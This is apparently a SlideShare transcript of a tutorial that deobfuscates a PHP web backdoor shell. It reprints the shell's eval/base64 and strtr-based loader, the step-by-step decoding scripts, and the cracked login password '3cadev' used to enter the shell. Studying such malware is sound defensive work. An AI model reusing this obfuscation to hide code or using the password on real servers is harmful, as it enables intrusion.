47300 php-web-backdoor-decode
0 likes114 views
This document describes how to decode an obfuscated PHP web backdoor shell file to recover the original source code and encrypted password. It involves using URL decoding and string manipulation techniques to gradually decrypt encoded variables and eval statements within the PHP file. After multiple levels of decoding, the document recovers the password hash, which is identified using an online tool as the plaintext password "3cadev", allowing access to the backdoor shell. The process demonstrates how cyber criminals hide backdoor code and the steps security researchers take to decode obfuscated files.
![eval(base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wT
zAwT08wMCgkTzAwME8wTzAwLDB4NDlmKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTy
gkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0R
kRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BR
UlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT
08wME8wME8wKTs='));
return;
?>
In the very beginning of the php file a variable $OOO000000 contains an encoded URL string.
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
First, we need to decode the value. In order to decode we will use python module. From Kali Linux
machine we will make an alias of the python command as urldecode.
root@kali:~# alias urldecode='python -c "import sys, urllib as ul; print
ul.unquote_plus(sys.argv[1])"'
After execute the command, we got the decoded value.
Figure 5: Decoded value
So, we found that value of variable $OOO000000 is fg6sbehpra4co_tnd
The next line of the php file is
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
Variable $OOO000000{4} references the 5th
position of the array which gives us value “b” from the
decoded string and variable $OOO000000{9} references the 10th
position of the array which gives us
value “a”. After applying this technique, we have got that value of variable $OOO0000O0 is base
We have decoded the following texts after applying the previous technique.
$OOO0000O0 = base
$OOO0000O0.= base64_d
$OOO0000O0.= base64_decode
$OOO000O00 = fopen
$O0O000O00 = fget
$O0O000O0O = fgetc
$O0O000O00 = fgets
$O0O00OO00 = fread
$OOO00000O = strtr](https://image.slidesharecdn.com/47300-php-web-backdoor-decode-200506053454/85/47300-php-web-backdoor-decode-5-320.jpg)
47300 php-web-backdoor-decode
- 1. PHP Web Backdoor Decode Mohammad Ariful Islam Twitter: @arif_xpress
- 2. Malicious piece of codes which allows an attacker to access the data, modify data, delete data, upload other files or even execute system commands to perform tasks such as create new user, read system files etc. is known as backdoor shell. If anyone browse file using web browser and if the file doesn’t exist then the user may see an error message which shows that the requested URL was not found. Usually the message is correct if web server doesn’t find the requested file but sometimes it doesn’t. As technology rapidly changes as well as cyber criminals applying new methods in order to hide their dirty piece of codes like backdoor shells which they use for hacktivist activities. Backdoor shells can be password protected in order to limit the access to the file and contains encrypted password in the source code of the file. Sometimes backdoor shell codes can be found in plain text and sometimes it can be obfuscated/encoded. In this article we will decode an obfuscated/encoded web backdoor shell. We will recover the original source code and the encrypted password in order to login to the backdoor shell. In this article we will use two virtual machines. In Windows 7, we configured XAMPP in order to host and browse the php backdoor file. Kali Linux used to perform some command line operations like URL decode, finding hash algorithm information etc. Source Code: https://github.com/xpress99/webshell Let’s browse the file 3ca.php in Windows 7 machine. Figure 1: Error message
- 3. Looks like the file 3ca.php is not exists in the webserver. But when we view the source code of the file then we see something interesting. A form exists with password filed! Figure 2: View source of 3ca.php Because of the CSS style properties, the password filed is invisible to the user. After changes the CSS rules from the Firefox browser, the password filed is now visible. Figure 3: Input filed We found a password field in this page. So, if we enter the correct password then may be will enter the backdoor shell. But where is the password?
- 4. Let’s check the source code of the file. Open the 3ca.php file in Notepad++ from Windows 7 machine. Figure 4: Partial source code of the file The source code is not in plain text and it is obfuscated/encoded with php eval function. The code will decode during the execution of the file. The original source code is too big but we don’t need to understand full code. We will work on the following source code. <?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000 000{5}; $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO00000 0{15}; $O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14}; $O0O000O0O=$O0O000O00.$OOO000000{11}; $O0O000O00=$O0O000O00.$OOO000000{3}; $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000 {16}; $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO0000 00{8}; $OOO0O0O00=__FILE__; $OO00O0000=0x206c4;
- 5. eval(base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wT zAwT08wMCgkTzAwME8wTzAwLDB4NDlmKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTy gkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0R kRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BR UlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT 08wME8wME8wKTs=')); return; ?> In the very beginning of the php file a variable $OOO000000 contains an encoded URL string. $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); First, we need to decode the value. In order to decode we will use python module. From Kali Linux machine we will make an alias of the python command as urldecode. root@kali:~# alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"' After execute the command, we got the decoded value. Figure 5: Decoded value So, we found that value of variable $OOO000000 is fg6sbehpra4co_tnd The next line of the php file is $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; Variable $OOO000000{4} references the 5th position of the array which gives us value “b” from the decoded string and variable $OOO000000{9} references the 10th position of the array which gives us value “a”. After applying this technique, we have got that value of variable $OOO0000O0 is base We have decoded the following texts after applying the previous technique. $OOO0000O0 = base $OOO0000O0.= base64_d $OOO0000O0.= base64_decode $OOO000O00 = fopen $O0O000O00 = fget $O0O000O0O = fgetc $O0O000O00 = fgets $O0O00OO00 = fread $OOO00000O = strtr
- 6. Using above information now we will try to decrypt the codes of eval(base64_decode) function from the encrypted php file. We will now change the php file as below and save the file as “3ca_decode.php” and execute from the browser. <?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000 000{5}; $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO00000 0{15}; $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000 {16}; $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO0000 00{8}; $OOO0O0O00=__FILE__; $OO00O0000=0x206c4; echo(base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wT zAwT08wMCgkTzAwME8wTzAwLDB4NDlmKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTy gkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0R kRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BR UlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT 08wME8wME8wKTs=')); return; ?> Let’s execute the file. Figure 6: First level decode After execution we have found another eval() function. It seems that we need to follow the same procedure until we get the decrypted codes.
- 7. So, we will modify the 3ca_decode.php file as below and execute again from the browser. <?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000 000{5}; $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO00000 0{15}; $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000 {16}; $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO0000 00{8}; $OOO0O0O00=__FILE__; $OO00O0000=0x206c4; $O000O0O00=$OOO000O00('C:xampphtdocs3ca.php','rb'); $O0O00OO00($O000O0O00,0x49f); $OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHY KNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVW XYZabcdefghijklmnopqrstuvwxyz0123456789+/')); echo($OO00O00O0); ?> Let’s execute the file again. Figure 7: Second level decode Still encrypted codes! But this time we found a function str_replace() which calls the file itself and replace some strings with others. The str_replace() function replaces some characters with some other characters in a string. It seems that one more execution of eval() function will give us the decrypted codes.
- 8. Let’s modify the 3ca_decode.php file and this time we will execute it from php command line. <?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000 000{5}; $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO00000 0{15}; $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000 {16}; $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO0000 00{8}; $OO00O0000=0x206c4; $O000O0O00=$OOO000O00('C:xampphtdocs3ca.php','rb'); $O0O00OO00($O000O0O00,0x49f); $OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHY KNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVW XYZabcdefghijklmnopqrstuvwxyz0123456789+/')); echo($OO00O00O0); $OO00O00O0=str_replace('__FILE_a',"C:xampphtdocs3ca.php",$OOO0000O0($OOO00 000O($O0O00OO00($O000O0O00,$OO00O0000),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjL lMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/'))); fclose($O000O0O00); echo($OO00O00O0); ?> Let’s execute from php command line. Figure 8: Found password hash Finally, we are able to decrypt the source code the encrypted php file. We have found the password hash value.
- 9. Using online free hash decryption tool, we found the plain text password which is 3cadev Figure 9: Decrypted password Finally, we are able to login to the web backdoor shell. Figure 10: Logged in to backdoor shell Sometimes it is very important to decode backdoors and identify their threat levels in order to prevent further damages.